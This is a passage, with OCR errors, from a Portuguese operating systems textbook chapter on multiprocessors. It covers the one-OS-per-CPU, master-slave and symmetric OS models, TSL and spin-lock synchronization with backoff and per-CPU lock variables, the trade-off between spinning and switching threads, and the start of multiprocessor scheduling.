1.8(b). O projeto de cache compartilhada most rado na Fi¬ 
gura 1.8(a), usado pela Intel, nao esta presente em outros 
multiprocessadores e pode afetar o desempenho. Sc um 
dos nucleos precisar de muita memória cache c os outros 
nao, esse projeto permite que se tonie a ąuantidade de 
cache que o mielec qudra. Por mitro lado, a cache com¬ 
partilhada la mb cm permite que um nticleo guloso" afete 
o desempenho dos outros nucleos. 

Os CMPs tambern sao difercmes no que se refere a lo- 
lerancia a falhas. Como as CPUs estao conectadas a curta 
distancia, falhas nos componentes com partii ha dos podem 
fazer com qu emu Itiplas CPUs pa rem ao mesmo tempo, situ a- 
ęao menos provavel nos m u lii processadores iradicionais. 
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Alem dos processadores multiniideo simę tri cos, nos 
quais todos os mldeos sao idenlicos, outra categoria exis- 
tente e a do sistema em um chip, Esses chips possuem 
lima ou mais CPUs prinripais, mas tambćm niicleos com 
propósitos esperiais, como dccocfilicadorcs dc audio c vi- 
cico, criptoprocessadores, intcrfaccs de rcdc c outros, fa- 
zendo com que um sistema com pu ta ci o na 1 intciro cxista 
em um chip* 

Assim como costumava acontecer no passado, o hard¬ 
ware esta sempre a frente do software. Embora os proces- 
sadores multinudco ja sejam realidade, nossa habilidade 
para cscrcvcr aplica^ocs para eles ainda c (icęao. As lin- 
guagens dc programowo atuais c os bons compiladores 
e ferramcntas dc depuraęao ainda sao cscassos. Poucos 
programadores ja tiveram expcriencias com program a Wo 
paralela e a maioria deles eon hece muito pouco sobre a 
divisao de uabalho cm multiplos pacotes que podem ser 
execmados em paralelo. Sincronizaęao, eliminaęao de sitn- 
aęoes de corrida e prevenęao de impasses serao pesadelos 
e, como resuitado, o desempenho sera fortememe afetado. 
Os semaforos nao serao a soluęao. Alem desses problemas 
iniciais, nao e tao óbvio saber quais aplicaęoes realmen- 
te prccisam de cemcnas dc nucleos, O rcconherimcmo da 
linguagem natural provavclmcnte poderia absorvcrgrandę 
parte do poder computadonal mas o problema aqui nao 6 
a falta de debs, mas a falta de algoritmos que fimcionem, 
Em suma, o pessoal da area de hardware pode liberar um 
produto que o pessoal da area de software pode nao saber 
como usar e que pode acabar rechaęado pelos usuarios. 

_ 8.1.2 1 Tipos de sistemas operacionais para 

multiprocessadores 

Vamos entao passar do hardware de multiprocessador 
para o software de mttllipiocessador, cm partieular, abor- 
dando sistemas operacionais dc mu Iti processadores. Yarias 
abordagens sao possweis. A seguir, estudaremos tres delas, 
Ohscrve que todas sao igualmente aplicaveis, tamo aos sis¬ 
temas multinudco ąuanto aos sistemas com CPUs discretas. 

Cada CPU tern seu próprio sistema operacional 

A maneira mais simpies possiyd de organizar um siste- 
ma operacional de multiprocessador e dividir esta lica me me 


a memória em muitas partiędes eon formę o nil mero de CPUs 
e dar a cada CPU sua própria memória e sua própria cópia 
privada do sistema operacional. Em consequencia, as n CPUs 
operam entao como tt computadores independentes. Urna 
otimizaęao óbvia consistc em permitir que todas as CPUs 
compartilhem o código do sistema operacional e faęam có- 
pias privadas somentc dos dados, como mostra a Figura S.7. 

Esse esquerna c melhor do que ter n computadores 
sępa rad os, visto que permite que todas as maąuinas com- 
partilbem um conjunto de discos e outros dispositivos de 
E/S, alem dc possibilitar que a memória seja compartilhada 
flcxivdnicntc ł Por cxemplo r sc um dia um programa mui- 
to grandę precisar ser excaitado, unia das CPUs pode ser 
alocada para ccdcr u ma grandę poręao de memória adido- 
nal durante a execuęao do referido programa. Alem disso, 
processos podem se comunicar efieazmente uns com os ou¬ 
tros por meio dc, digamos, um produtor que escreva dados 
diretamente na memória e um consumidor que busąiie a 
partir do local escrito pelo produtor. Ainda assim, do ponto 
de vista dc um sistema operadonal, cada CPU ter scu pró¬ 
prio sistema operacional c muito primitivo. 

6 importame mencionar expiiciiamente quatro a spec- 
los desseprojetn que talvez nao sejam tao óbvios, Primeiro, 
quando um processo laz u ma chamada de sistema, a cha- 
mada e capturada e traLada em sua própria CPU usando 
as estruturas de dados nas tabclas do sistema operadonal. 

Em segundo lugar, visto que cada sistema operadonal 
tern suasproprlas tabelas, tambem tein seu próprio conjun- 
lo de processos que ele mesmo escalona. Nao existe coin- 
partilliamento de processos. Se um usuario entra na CPU 
l r todos os seus processos executam na CPU 1. Consequen- 
temente, pode ocorrcr que a CPU 1 esteja ociosa cnquanto 
a CPU 2 esta carrcgada com trabalho. 

Em tereeiro lugar, nao existe compartilhamemo de 
paginas. Pode acontecer que a CPU 1 tenha paginas para 
ceder cnquanto a CPU 2 esteja paginando continuameme. 
Nao hi como a CPU 2 emprcsiar algumas paginas da CPU 
U visto que a alocacao dc memória c fixa. 

Em qnarto lugar — c piór — se o sistema operario- 
nal mantem urna cache como buffer dos blocos de discos 
usados recentemenie, cada sistema operacional o faz in- 
dependememente dos outros. Assim, pode acontecer que 


CPU 1 CPU 2 CPU 3 CPU 4 Memória E/S 



y- - 

^Barramento 


■ Figura 8.7 Compartilhamento da memória entra as quatro CPUs, mas comparlilhando somente urna cópia do código do sistema 
operacional, As caixas identifreadas como ‘Dados 1 contóm os dados parlicuJares do sistema operacionaf para cada CPU. 
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um certo bloco do disco esteja preseme e sujo em varias 
caches dc huffers ao mesmo tempo, levando a resullados 
mconsistentes. A unica maneira dc evitar esse problema e 
elimina r as caches de buffer. Fnzer isso nao e dificil, mas o 
dcsempenho ć consideravelmentc prejudicado. 

Por essas razoes, esse modele diJkilmeme e utilizado — 
embora tenha sido empregado no inicio da era dos mui- 
liprocessadores, quando o objetivo era viabilizar, o mais 
rapido possivel, o uso dos sisiemas operacionais existentes 
nos novos multiprocessadores. 

Multiprocessadores 'mestre-escrayo' 

Um segundo modclo e mostrado na Figura S.S. Nele, 
uma copia do sistema operacional c suas labelas estao 
presentes na CPU 1 e em mais nenhuma ouira. Todas as 
chamadas dc sislema sao rediredonadas para a CPU 1 para 
processamcmo nda. A CPU 1 tambem pode excaHar pro¬ 
cessos do usuario se cxistir tempo de CPU dispomvel, Esse 
modclo e cbamado de niestre-e$cravo, visto que a CPU 1 
e o processador mestre c todas as riemais sao cscravas. 

O modclo mestre-escravo rcsolve a maioria dos pró¬ 
bie mas do primeiro modclo. Existe uma unica estruiura 
de da dos (uma lista ou um conjunio dc lisias priorizadas) 
quc mantem o eon troi e dos processos pronlos* Quarulo 
uma CPU lica ociosa, ela pode ao sislema operacional um 
processo para executar e de Lhc atribui algurru Assim, uma 
CPU nunca esta ociosa enąuanto ouira esta sobrccarregada. 
Da mes ma maneira, paginas podem seralocadas dioamica- 
nieme entre todos os processos e cxisie somente uma cache 
de buffer, de modo que as incousisteneias nunca ocorrem. 

O problema com esse modclo e que, com mu i las 
CPUs, o mestre torna-se um gargalo. Alina 1 de comas, ele 
deve lidar com todas as chamadas de sistema de todas as 
CPUs. Se, digamos, 10 por cento de todo o tempo e gasto 
li da ndo com chamadas dc sistema, entao 10 CPUs sera o 
suficicntcs para saturar o mestre e com 20 CPUs ele cs- 
tara completamente sobrecarrcgado, Assim, esse modclo 
e simples c fundonal para multiprocessadores pcqucnos, 
mas e inefidente para grandes. 

Multiprocessadores simetrkos 

Nosso terceiro modclo, o SMP {symmetric m.ultiproces- 
sor — multiprocessador simetrico), elimina essa assimetria. 


Existe unia cópia do sistema operacional na memória, mas 
qualquer CPU pode execitla -ta. Quando e feita uma chama- 
da de sistema, a CPU local chamada e desvlada para o modo 
niideo e a processa. O modclo SMP e ilusirado na Figura S.9. 

Esse modele balanceia dinamicamenie processos e me¬ 
mória, uma vez que existc apenaś um conjunio de labelas 
do sistema operacional. Ele tambem elimina o gargalo da 
CPU mestre, pois nao existe nenhum mestre, mas introduz 
sens próprios problemas. Em particular, se duas ou mais 
CPUs estao executando o código do sistema opera don a 1 ao 
mesmo tempo, alguns desastres poderao acomcccr. Ima- 
ginę duas CPUs pegando simułtaneamente o mesmo pro¬ 
cesso para executar ou rdvindicando a mesma pagina de 
memória livre. O nteio mais simples para resolver esses 
problemas e associar um muiex (isto e, urna variavel de 
uavamemoj ao sistema operacional, t orna udo todo o siste¬ 
ma uma grandę regiao crfiica. Quando uma CPU querexe- 
cutar o código do sistema operacional, da deve primeiro 
adąuirir o mutex + Sc esie esta impedido, de simpleśnienie 
espera. Assim, qualquer CPU pode executar o sistema ope¬ 
racional, mas somente uma de cada vez. 

Esse modclo fund ona, mas c quase tao ruim quamo o 
modclo mestre-cscravo* Novamente, vamos supor que 10 
por cento de todo o tempo dc execuęao seja gasto dentro 
do sistema operacional Com 20 CPUs, havera longas ftlasde 
CPUs esperancie para obter o sistema operacional, Feliz- 
mente, e Jadł melhorar isso. Muitas partes do sistema ope¬ 
racional sao independcmes umas dasoutras. Por exemplo, 
nao exisie nenhum problema se uma CPU execuia o esca- 
lonador enąuanto ouira tram uma chamada de sistema de 
arquivos c uma lerceira processa uma Talia de pagina. 

Essa observaęao lcva a divisao do sistema opcracio- 
nal em rcgióes crfticas independemes, que nao imeragem 
umas com as outras. Cada regiao crilica e protegida por seu 
próprio mmex, de modo que somente urna CPU pode exe- 
aita-la de cada vez. Assim, pode-se conscguir muiio mais 
paralelismo. Comudo, e bern possivel que algurnas tabelas, 
como a mbela dc processos, sejam usadas por mutliplas re- 
giócs criticas. Por cxemplo, a tabela dc processos c necessa- 
ria para o c scalona men to, mas tambem para a chamada de 
sistema fork e para o trata men to de sinais. Cada tabela que 
pode ser usada por mul li pląs regioes crfticas precisa de seu 
próprio mutex. Assim, cada regiao crilica pode ser exccum- 


CPU 1 CPU 2 CPU 3 CPU 4 Memória E/S 



\ 


Barraruento 


I Figura 8.3 Um model o de multiprocessadores mestre-escravo. 
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GPU 1 CPU 2 CPU 3 CPU 4 Me morfa E/S 



Barramento 


I Figura 8.9 0 modęło de multiprocessadores simótricos (SMR). 


da sómente por inna CPU de cada vez, e cada tabela crftica 
pode ser acessada somente por uma CPU de cada vez* 

A maioria dos mułtiprocessadores modernos usa essa 
organizaęao. Nessa maąuma, a parte complicada na escrita 
do sistema operacional nao e que o código real seja muito 
difcrente daqudc de um sistcma operacional comum, Nao 
e. O complicado e quebra-lo em regioes crfticas que pos¬ 
sani ser executadas ao mesmo tempo por CPUs dilerem cs, 
scm a interferenria de u mas com as o utrą s, mesmo quc dc 
moncira indireta c smiL Alem disso, cada tabela, deniro dc 
dii as on mais regioes crfticas, devc ser protegida sępa rada - 
mente por um nmu% e lodo código que usa a tabela deve 
empregar o mutex corretamente. 

Alem disso, deve-se tom ar mu i to cuidadó pata evitar 
impasses. Se duas regioes crfticas prccisam tanto da tabela 
A quanto da tabela & c uma delas reivindtca primdro A e a 
outra rdvindica primdro B r mais cedo on mais tarde ocor- 
rera um impasse e ninguem sabera por que. Tcoricameme, 
todas as tabelas poderiam ser assoćadas a numeros inteiros 
e todas as regioes crfticas seriam instrufdas para adquirir 
tabelas em ordem crescente. Essa estrategia evita impasses, 
mas exige que o programador planeje muito cuidadosa- 
mente de quais tabelas cada regiao crftica precisa para fazer 
as rcquisięoćs na ordcm correta. 

No dccorrer da evoluęao do código, uma regiao cri- 
tica pode precisar de uma tabela nova de que nao ten ha 
precisado anleriormentc. Se o programador e um nova- 
to e nao enteiule a lógica completa do sistema, entao ele 
sera teniado a simplesmentc assodar um inutex a tabela, 
no porno em que da e neeessaria, e libera-la quando nao 
for mais titil. Apesar de parecer razoavcl, essa Lecnica pode 
levar a impasse, que o u su ario só pereebera quando o sis- 
tema parar. Programar o sistema correta menie nao e facil 
e mame-lo correto duranie a nos, considerando a troca de 
programador es, e muito diffcil. 

8,1,51 Sincronizaęao em 
multiprocessadores 

As CPUs de um rmiltiprocessador Ireąueniemente pre¬ 
cisam dc sincronizaęao. Acabamos de ver o caso no qual as 
regioes crfticas e as tabelas do nucleo devem ser prolegidas 


por um mutex. Vamos agora cnicnder como cssa sincroni¬ 
zaęao realnienie funciona em um. nuiUiprocessador. Hsse 
processo esta longe de ser trivial, como vercmos. 

Antes de tu do, primitivas de sincronizaęao adeąuadas 
real nieme sao necessarias. Se um processo em um uni- 
processador realiza uma cha mada de sistema que requer 
o acesso de algunia tabela crftica do luideo, o código do 
nudco pode simplesmentc dcsabilUar a imerrupęao antes 
de manipular a tabela. Ele pode, entao, fazer sen trabalho 
sabendo que sera capaz de finaliza-lo sem que qualquer 
outro processo intrometido entre e manipule a referida ta¬ 
bela antes que ele a libere. Em um multiprocessador, a 
desabilitaęao da imerrupęao a feta somente a CPU que a 
esta execuiando. Conseąuentemente, um proiocolo mu - 
tex adequado tern de ser usado e respeitado por todas as 
CPUs para garantir que □ exdusao mulua funcione. 

O coraęao dc qualquer proiocolo mutex prali co c uma 
instruęao que per mi te que uma palavra dc memória seja 
iuspecionada e aj u sta da por meto de uma operaęao indi- 
visfvel. Vimos como uma instruęao TSL (test and set lock) 
foi usada na Figura 2.17 para impkmemar regioes crilt- 
cas. Como discutimos aiueriormente, o que essa instruęao 
faz e ler uma palavra de memória para depois armazena- 
-la em um registrador. Simultaneamente, ela escreve 1 
(ou algum outro valor nao nulo) dentro da palavra de 
memória. Obviamente, cla gasta dois cidos separados de 
barramento para esecutar a leitura e a escrita, ambas na 
memória. Em um uniproccssador, enquanto a instruęao 
TSL nao puder ser interrompida no rncio do caminho, cla 
sempre ira trabalhar eon formę o planejado. 

Agora imagine o que ocorreria cm um multiproccs- 
sador. Na Figura S.IO, vemos uma situaęao exl rema men¬ 
te crftica, na qual a palavra 1000 da memória esta sendo 
usada como uma variavel de travamento de valor inicial 
0, No passo 1, a CPU I Ic a palavra c obtem 0, No passo 2, 
ames que a CPU \ tenha a oportunidade dc reescrcver I 
na palavra, a CPU 2 entra e tambem le o valor da palavra 
como 0. No passo 3, a CPU 1 escrcvc 1 na palavra. No 
passo 4, a CPU 2 tambem reescrevc J na paiavra, Assim, 
as duas CPUs obtem um 0 da instruęao TSL de modo que as 
duas CPUs obtem accsso a regiao crftica e a cxclusao mu¬ 
liła nao esta garami da. 
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I Figura 8.10 A insinjgao TSL pode fathar se o barramento nao puder ser travado. As ąuatro etapas da figura most ram utną 
sequencia de eventos na qual a falha e demonstracja. 


Para prevcnir cssc pi obiema, a instruęao TSL dcvc pri- 
meiro impedir o acesso de outras CPUs ao barramemo para 
tkpois fazer ambos os aeessos a memoria e, Bnalmente, 
liberar o barramemo. Em geral, o lravamento do barra- 
mento e kilo por meio de reąuisigao do barramemo que 
use nm protocolo usual, sinalizando (isto e, aj u stand o para 
um valor lógico 1) alguma linlia espedal do barramemo 
ate que ambos os cidos tenham sido rond indos, Enquanlo 
essa lin ha espedal es t Wer sendo sinalizada, nenhuma o utrą 
CPU tera o dirrito de acesso ao barramemo, Essa instruęao 
somente pode ser implementacja cm um barramento que 
lenha as liohas e o protocolo (hardware) necessario para 
lisa-las. Os barramentos modernos apresentam essas faci- 
Udades, ao contrarjo daąudes mais amigos, de modo que 
nao era possWel i mpk me mar TSL co rre ta menie. Foi para 
isso que o protocolo de Peterson foi invemado: para sincro- 
nizar tudo via software (Petersom 1981). 

Se a TSL e corretamente implementada e usatia, ela ga- 
ramę que a exclusao muiua possa ser feita para funcionar. 
Co n tu do, esse metodo de exdusao mutua usa spin lock, 
pois a CPU reąmsiiante simpksmente permanece em um 
lago estreito tesla udo a variavel de travamenio o mais ra- 
pido que ela pode. Isso nao só faz a CPU (ou o eon junto de 
CPUs) requisitante desperdięar completamente seu tempo, 
mas tambem pode colocar urna targa excessiva no barra¬ 
memo ou na memoria, freando seriamente todas as outras 
CPUs que estao tentando fazer su as tarefas habituais, 

Aprimeira vista, pode parecerque a presenęa de cache 
deveria eiiminar o problema da contenęao no barramemo, 
mas isso nao ocorre. Teoricamente, se a CPU reąuisitante 
ja tinha lido a variavel de travamento, ela deveria obter 
uma copia a parrir de sua cache. Enquanto nenhuma outra 
CPU tentasse usara variavel a CPU requisilante deveria ser 
capaz de executar com o valor obtido de sua cache. Quan- 
do a CPU que detem a variavd de travamento escreve 0 
uda para depois libera-la, o protocolo da cache invalida 
automat kamen te todas as cópias da variavd nas caches 
remotaSp exigindo que os valores corretos sejam buscados 
nova nieme. 

O problema e que as caches operarn em blocos de 32 
ou 64 bytes. Em gernl, as pa la v ras ao redor da variavd de 
travamento sao necessarias a CPU que detem cssa variavel. 


Visto qtie a instruęao TSL e unia escrita (pois modifica a va- 
riavel), da nccessita dc acesso exclusivo ao bloco da cache 
que eon Lem a variavel de lravamento. Porta lito, cada TSL 
hwaljda o bloco na cadic do proprietańo da variavcl e bus- 
ca uma copia exdusiva e prWada para a CPU reąuisilame. 
Assim que o proprietańo da variavel de iravamemo ma ni¬ 
po lar uma palavra adjacente, o bloco da cache sera movi- 
do para sua maąuina. Consequememente, to do o bloco da 
cache contendo a vartavel esta constantememe yiajando 
entre o proprietario e o reąuerente da variavel de trava- 
mento, gerando ainda mais trafego no barramemo do que 
deveria cxisiir nas kituras indWjduais da variaveL 

Se fosse postawi fi car 3ivre dc todas as escritas indu- 
zidas pelo TSL no lado reąuisitante, podenamos reduzir 
apredavelmente a ultrapaginaęao {thra&hmg) na cache. 
Esse objetWo pode ser alcanęado se a CPU reąuisitante fi- 
zer primeiro uma lettura simpks para verificar sc a varia- 
vel de travamento esta livre. Someme se a variavel estiver 
livre a CPU pociera execmaraTSLpara, de falo, adąuiii-la. 
O resuhado dessa peąuena alteraęao e que a maioi parte 
das negodaęoes e, agora, dc leiLura cm vez de escrila. Se 
a CPU detentora da variavel de travamento esta apenas 
lendo as variaveis no mesmo bloco da cache, as demais 
podem, cada uma, ter uma cópia do bloco da cache no 
modo compartilhado somente lei tura, eli mina udo todas 
as tramferencias de blocos da cache. Quando a variavd 
de travamento e por firn liberada, o proprietario faz uma 
escrita, que reąucr acesso cxclusivo, invaiidando, a$sim r 
todas as outras cópias nas caches remotas. Na próxima lei- 
tura da CPU reąuisitante, o bloco da cache sera recarrega- 
do. Notę que r se dtias ou mais CPUs esiiverem competindo 
pela mesma variavel de travamento, elas poderao perceber 
ao mesmo tempo que a variavel esta livrc e, assim, ąuerer 
exectiiar uma TSL simulianeamenie para acląuiri-la. So¬ 
mente urna delas sera bem-sucedida, de modo que nao 
existe nenhuma eon di ęa o de disputa nesse caso porąue a 
aąuisięao real e feita pela instruęao TSL e essa instruęao 
e atómica. Uma vez que a variivel de trava mento es tej a 
livre, a tentattva de captura-la imediatamente com uma 
TSL nao tem ga ramia de sucesso. Qualquer CPU podera 
vencer, mas, para o algorinno funcionar adeąuadamente, 
nao faz diferenęa ątial delas obtem a variavel. Uma lei- 
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tura simples bem-sucedida e simplesmeme inna dica de 
que pode ser u ma boa hora para tentar obler a variavel 
de travamemo H mas nao e garantia de que a temativa de 
aquisk;aQ sera bem-sucedida. 

Unia outra inaneira de reduzir o traf eg o do barramen- 
to e usar o algoritmo de recuo exponendaI binario (binary 
expOfmttial backoff) p a dra o B h e r net (Anderson, 1990). Hm 
vez de testar continuamente, buscando obter a variavel de 
travamento H como na Figura 2.17, insere-se um laęo com 
um a traso entrc cada tentativa. Inicialmente, o a traso ć de 
urna instruęao. Sc a variavd ainda cstivcr ocupada, o a tra¬ 
so sera dobra do para duas instruęóes, depois para qualro, 
c assim sucessivamente atc algum maximo. Um inaximo 
pequeno forncce unia rcsposta mais rapida quando a vari- 
avel de travamento esta livre, mas desperdięa mais cidos de 
barramento na ultrapaginaęao na cache. Um maximo gran¬ 
dę reduz a ultrapaginaęao na cache a custa de nao notartao 
rapidamente se a variavel esta livre. O recuo exponencial 
binario pode ser usado coni on sem as Icituras simples que 
precedem a instruęaoTSL 

Unia ideia ainda me!hor e dar a cada CPU que deseja 
adquirir o mutex sua própria variavel de travamento priva- 
da para testar, conforme ilustrado na Figura 8*11 (Mellor- 
-Crummey e Scott, 1991}* A variavel privada deve residir 
cm um bloco nao usado da cache para evitar conflitos* O 
algoritmo faz com que a CPU que nao conseguc adquirira 
variavel de travamemo aloąue urna variavd de iravamen- 
to privada, ligando-se ao finał de inna lisia de CPUs a espe- 
ra da variavel Quando o de lent or atual da variavel sal da 
regiao crftica, ele libera a variavel de travamento privada 
que a primeira CPU da lista esta teslando (em sua própria 
cache). Essa CPU entra, entao, na regiao crftica. Quando 
cla lenni na, libera a variavel de travamento privada que 
stu sucessor esta usando, e assim por dianie* Embora o 
protocolo seja algo complicado (para evitar que duas CPUs 
se liguem simuhaneamerue a o finał da lisia), ele e efkieme 
e nao causa manięao {sta milion). Para mais de ta 111 es, os lei- 
tores devem consultar o artigo niendonado. 
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Teste contmuo versus chaveamento 

Ate agora, supomos que a CPU que necessita de um 
mutex impedido simplesmeme espera por ele testando de 
modo contmuo, testando de modo intermitente ou se !i- 
gando a uma lista de CPUs a espera da variavel de trava- 
mento. Em alguns casos, nao existe unia aJternativa real 
para a CPU rcąuisitantc quc nao seja esperar. Por exeinpIo, 
suponhamos quc alguma CPU esteja ociosa c prccisc accs- 
sar a lista compartilhada dc proccssos prontos para obter 
um processo para executau Sc a lista dc proccssos prontos 
esta bloąueada, a CPU nao pode s im pleśnie n te decidir sus- 
pender aqnilo que esia fazendo e executar um ouiro pro¬ 
cesso, pois isso vai requerer o acesso a lista. Ela deve esperar 
ate que possa acessar a lista de prontos. 

Contudo, em outros casos, ha uma cscolha. Por exem- 
plo, sc algum thread em unia CPU precisa accssar uma ca- 
che de buffer do sistema dc arquivos atualmente impedida, 
a CPU pode decidir chavcar para um thread di f ej en te em 
vez de esperar. A decisao sobie se e melhor esperar ou la- 
zer um chaveamento de thread tem sido objęto de mui- 
tas pesquisas, algumas das quais serao discutidas a seguir. 
Notę que essa questao nao ocorre em um monoprocessador 
porque a espera nao tem sentido quando nao existe outra 
CPU detendo a variavel de travamento. Se um thread fa- 
Ilia ao tentar adquirir uma variavel dc travamento, ele sera 
sempre bloqucado para dar oportimidade ao proprictario 
da variavd de ser cxccutado c, assim, libera-la. 

Supondo que tamo o teste contmuo quanto o chavea- 
mento de thread sejam opęoes praticaveis, a analise da re- 
iaęao entre custo e beneffcio pode ser feila conforme se- 
gue. A utilizaęao de teste contmuo desperdięa diretamente 
ciclos dc CPU, Testar uma variavcl de travamento repet]- 
dainente nao e um tra balho prod utivo. No entamo, o chavea- 
mento dc thread tambóm desperdięa ciclos de CPU, visto 
que o estado do thread atual deve ser salvo, a variavcl de 
iravamento para a lista cic proccssos prontos tem de ser ad- 
quirida, um thread precisa ser sdecionado, seu estado deve 
ser carregado e ele deve ser iniciado. Alem disso, a cache 


CPU 3 


CPU 2 testa sobre esta \zariaval 
de trava (privada) 


Memória compartilhada 



CPU 1 detam 
a variavel de 
trava real 


CPU 3 testa sobre esta vartavel 
de trava (privada) 


CPU 4 testa sobre esta vafi4vel de 
trava (privada) 


Quando a CPU 1 acaba de usar a varfavel de 
trava real., ela a libera e tambem libera 
a variavel de trava privada sobre a quai 
a CPU 2 esta testando 


I Figura S. 11 Uso de multlplas vari^veis de travamento para evitar a sobrecarga da cache, 
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atual da CPU contera lodos os blocos errados, de modo que 
ocorrcrao muitas fal las dc ca dic dc alto custo assim quc o 
novo thread comeęar a exeaua.r. Falhas na TLB lambem 
sao provavds. Por firn, deve ocorrer urn chaveamento de 
volta para o thread ongi na I, s egu i do de mais faltas na ca- 
che* Os cidos gastos para realizar esses dois chaveamentos 
e mais lodas as fakas na ca cli c sao desperdięados* 

S up on do que um mutex seja dcli do por 50 ps, quc o 
chavcamemo do thread atual leve ] ms c que o chavca- 
mento dc volta para o thread originaJ 3eve 1 ms, e mais 
efidente simplesmente esperar pelo mutex. Por ornro lado, 
se um mutex e detido em media por 10 ms, vale a pena o 
irabalho todo de fazer os dois chaveamentos. O problema e 
que a duraęao das regioes criticas pode variarconsideravd- 
mente. Portanto, qual e a melhor soluęao? 

Urna aliernativa e semprc realizar o tesle commuo, 
Unia segunda altcmativa e semprc chavear. Mas ha unia 
terccira, que consiste em tom ar urna dccisao independen- 
le cada vez que urn rmitex iravado e cncontrado. No mo- 
mento cm quc a dccisao tem dc ser tornada, nao sc sabc 
se e melhor testar on trocar, mas, para alguris sistemas, e 
possfvd anotar todas as atmdades e analisa-Ias depois. Eii- 
lao, retrospectivamente, pode-se dizer qual foi a melhor 
dccisao c quanto tempo sc perdeu no melhor caso. Essc 
algoriimo, baseado na compreensao tardia do que ocorrcu, 
pode ser usado depois como um benćhmark de comparaęao 
para os algoritmos pa$sfveis de medięao. 

Essc problema tern sklo estudado por vai ios pcsąuisado- 
res (Karlin et al, 1989; Karlin et al, 1991; Ousterhout, 1982). 
A maioria dos trabalhos usa um modelo no qual o thread 
que fal ha na aquisięao de um mutex espera durante ałgum 
penodo de tempo, Se essc lhnite de tempo e ultra passa do, 
ocorre um chaveameiuo para outro thread. Em alguns casos 
essc tempo c fixo, geralmente cquivalemc ao atraso conhc- 
cido para cbavear para um outro thread e depois chavear dc 
volta. Em outros casos csse tempo ć dmamico, dependendo 
do histórico observado do mutex que esta sen do esperado. 

Os melhores resultados sao alcanęados quando o sisle- 
ma mantem o centrale dos ultimos tempos de espera ob- 
servados e supde que o atual sera simiiar a os anteriores. 
Por exemplo> considerando novamente um tempo de cha- 
veamemo de comexto de 1 ms, um thread deve espera r por 
um maximo de 2 ms, mas observa o ąuanto cle realmente 
esperou. Se ele fal ha na aquisięao da variavel de travamemo 
e se nas iiltimas tres tentativas esperou em media 200 ps, ele 
deve esperar por 2 ms antes do chaveamento de contexto. 
Conuido, sc ele veriiica que esperou pelos 2 ms completos 
em cada uma das ientativas anteriores, ele deve chavear 
imediatamente e nao esperar mais. Mais detalhes podem 
ser encontrados em Karlin et al, 1991. 

8.1.41 Escalonamento de 
multiprocessadores 

A mes de abordar o escalonamento em multiprncessa- 
dores, e nccessario determinar esta sendo cscalonado. 


Antigameme, quando lodos os processos tinham apenas 
um thread, somente os processos eram escalonados — nao 
havia nada mais que fosse escalonavel. Hojc em dia, todos 
os sistemas operacionais modernos per mitem o multithrea- 
ding, o que torna o escalonamento ainda mais complicado. 

fi importante saber se o thread e de mielec on de usua- 
rio. Se os ihreads sao ex ecu ta dos por unia biblioteca do es- 
paęo do usuario e o micleo nao sabc nada a respeito dclcs r 
en tao o escalonamento aconiece com base nos processos, 
como de costume. Se o niideo sequer sabe que os threads 
existem, diflcLlmente conseguira escalonados. 

Com os threads de riucleo, a situaęao e diferente. Aqui 
o niidco esta ciente da cxistenda dc todos os threads c 
pode selcdonar o quc deseja dentre aquclcs pcrtcnccmes 
a um processo, Nesses sistemas, a tendentia e que o nu- 
cleo escolha um thread para ser executado e o processo 
ao qual pertence tem uma participaęao pcąucna (ou talvez 
nenii u ma participaęao) no algoritmo de seieęao. A seguir, 
abordaremos o escalonamento de threads, mas lembramos 
que em um sistema no qual os processos tem somente um 
thread ou no qnal os threads sao implemeniados no espaęo 
do usuario, os processos e que sao escalonados, 

A qucstao processo ucrsws thread nao c a iinica relacio- 
nada ao escalonamento, Em um monoprocessadon o es- 
calonamenLo e imidmiensional. A unica questao que deve 
ser respondida (repetidamente) e: "Qual processo deve ser 
o próximo a CKecutar?". Em um multiprocessador, o es- 
calonamemo e bidimemional. O escalonador deve decidir 
quais sao os processos e sobre quais CPUs eles sera o execu- 
tados. Essa segunda dimensao complica bastante o escalo¬ 
namento nos multiprocessadores. 

Um fator complicador adicional e que, cm alguns sis¬ 
temas, os processos nao sao rclacionados, ao passo quc cm 
outros des trabalham em grupos. Um exemplo da primeira 
skuaęao e o sistema de tempo compartilhado {time$k&rm§) f 
no qual os usuarios independentes i nicią m processos in- 
dependentes, Os ihreads de difererues processos nao sao 
relacionados e cada um pode ser escalonado sem que os 
demats sejam considerados. 

Um exemplo da segunda situaęao ocorre regułar- 
menie nos arnbientes de deseńvolvjmenio dc prógramas. 
Os grandes sistemas muitas vezcs consistcm cm um mi me¬ 
ro dc arquivos dc cabcęalho (headerfiks) contendo macros, 
definiędes dc tipos e declaraędes das variaveis empregadas 
pelos arquivos reais de códigos. Quando um arquivo de ca- 
beęalho c modificado, todos os arquivos de códigos que o 
incluem devem ser reconipilados, O program a make £ co- 
mumente usado para gerenciar o desenvolvimenn>. Quan- 
do o make e invocado, ele inicia a compilaęao somente dos 
arquivos de códigos quc dcvem ser recornpilados cm de- 
correncia das mudanęas nos arquivos dc cabcęalho ou de 
eódigo. Os arquivos-objęto ainda validos nao precisam ser 
gerados novamente. 

A versao ongi na I do make fazia seu trabalho sequen- 
cialmcme, mas as versócs rccemcs projetadas para mul- 
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tiprocessadores podem inicializar todas as compilaęoes de 
unia vez, Se sao necessarias dez compilaęoes, nao tern sen- 
tido escalonar nove delas imediatamente e deixar a ultima 
para mais tarde, pols o usuario nao percebera qne o traba- 
lho foi conduido atć que a ultima iinalizc. Ncssc caso, ć 
cabfvcl considcrar os proccssos como urn grupo c lcvar isso 
cm considcraęao durante o escalonamento* 

Tempo compartilhado 

Yamos primeiro abordar o caso do escalonamento de 
proccssos independeutes; depois veremos como escalonar 
threads reladonados, O algoritmo de escalonamento mais 
simples para tratar dc threads nao reladonados emprega 
urna u ni ca estru tura de dados para os threads prontos no 
sistema — talvez simplesmente urna lisia o u, mais prova- 
vclmente, um conjunio dc listas para threads com diferco- 
tes prioridades, como mostrado na Figura 8.12(a). Messa 
figura, as 16 CPUs estao alualmente ocupadas e um con- 
junto de 14 threads priori zad os esta esperando para exe- 
cutar. A primeira CPU a finałizar seu irabalho atual (ou 
ter sen processo bloąueado) e a CPU 4, que r entao, obtem 
a variavel de travamento para as filas de escalonamento e 
seleciona o processo de maior prioridade, A, como mostra 
a Figura S, 12(b). Em seguida, a CPU 12 torna-se odosa e 
cscolhe o processo B , como se observa na Figura 8,12(c). 
Desde quc os processos sejam complctamentc nao rclacio- 
nados, fazer o escalonamento assim e urna escolha razoavel 
c e bastante simples implernenta-io de forma cfiriente. 

Quando se tern urna linica estrutura de dados de esca- 
